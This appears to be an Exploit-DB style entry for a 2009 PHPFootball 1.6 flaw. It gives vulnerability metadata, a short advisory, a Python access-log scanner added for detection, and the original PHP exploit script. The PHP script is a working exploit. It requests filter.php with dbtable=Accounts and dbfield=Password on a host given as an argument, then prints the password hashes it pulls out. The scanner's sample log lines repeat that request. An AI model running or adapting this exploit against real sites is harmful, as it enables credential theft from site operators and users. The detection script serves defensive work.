Vendor: PHPFootball
By: KinG-LioN
CVSS: 7.5 HIGH
Remote Hash Disclosure
CWE: 20
Product Name: PHPFootball
Affected Version From: 1.6
Affected Version To: 1.6
Patch Exists: YES
Related CWE: N/A
CPE: a:phpfootball:phpfootball
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit

This exploit allows a remote attacker to disclose the password hashes stored in the vulnerable application's database. The vulnerability is caused by insufficient sanitization of user-supplied input passed to the 'dbfield' parameter of the 'filter.php' script. By sending a specially crafted HTTP request to the vulnerable script, an attacker can view the password hashes stored in the database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
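
One way to check web server access logs for requests of the kind described above, as an added example that is not part of the original advisory or exploit: it flags filter.php requests whose dbtable/dbfield pair falls outside an allowlist. The allowlist contents, the common/combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the table/column pairs the site legitimately exposes through
# filter.php. These names are hypothetical; substitute your installation's.
ALLOWED = {"players": {"name", "team"}, "matches": {"date", "venue"}}

# Common/combined log format: client ... "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2009:10:00:00 +0000] "GET /football/filter.php?dbtable=Players&dbfield=Name HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2009:10:00:05 +0000] "GET /football/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2009:10:00:09 +0000] "GET /football/filter.php?dbtable=Accounts&dbfield=%50assword HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2009:10:00:12 +0000] "GET /football/index.php HTTP/1.1" 200 900',
]


def suspicious_filter_requests(lines):
    """Return (client, status, dbtable, dbfield) for each filter.php request
    whose dbtable/dbfield pair is not in ALLOWED."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/filter.php"):
            continue
        # parse_qs percent-decodes values, so encoded spellings are normalised.
        q = parse_qs(url.query, keep_blank_values=True)
        if "dbtable" not in q and "dbfield" not in q:
            continue
        # PHP keeps the last value of a repeated parameter, so do the same.
        table = q.get("dbtable", [""])[-1].strip().lower()
        field = q.get("dbfield", [""])[-1].strip().lower()
        if field not in ALLOWED.get(table, set()):
            hits.append((client, int(status), table, field))
    return hits


if __name__ == "__main__":
    for hit in suspicious_filter_requests(SAMPLE_LOG):
        print(hit)
```

Hits answered with status 200 are the ones worth treating as a likely disclosure of the stored hashes.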

Exploit-DB raw data:

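<?php

// http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip

// Check the argument count before reading $argv, so a missing argument
// prints the usage text instead of raising undefined-offset notices.
if ($argc != 3) {
    echo "PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit\n";
    echo "by KinG-LioN - http://eurohackers.it\n";
    echo "Usage: php {$argv[0]} <host> <path>\n";
    exit;
}

$host = $argv[1];
$path = $argv[2];

// The request names the Accounts table and its Password column through
// the dbtable and dbfield parameters of filter.php.
$head  = "GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n";
$head .= "Host: {$host}\r\n";
$head .= "Connection: close\r\n\r\n";

$fsock = fsockopen($host, 80);
if (!$fsock) {
    die("connection error\n");
}
fputs($fsock, $head);

// Read the whole response.
$cont = '';
while (!feof($fsock)) {
    $cont .= fgets($fsock);
}
fclose($fsock);

// The returned values appear as cells of the result table.
if (preg_match_all("/<td class=td>(.+?)<\/td>/", $cont, $i)) {
    print_r($i[1]);
} else {
    die("exploit error\n");
}

?>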

# milw0rm.com [2009-01-01]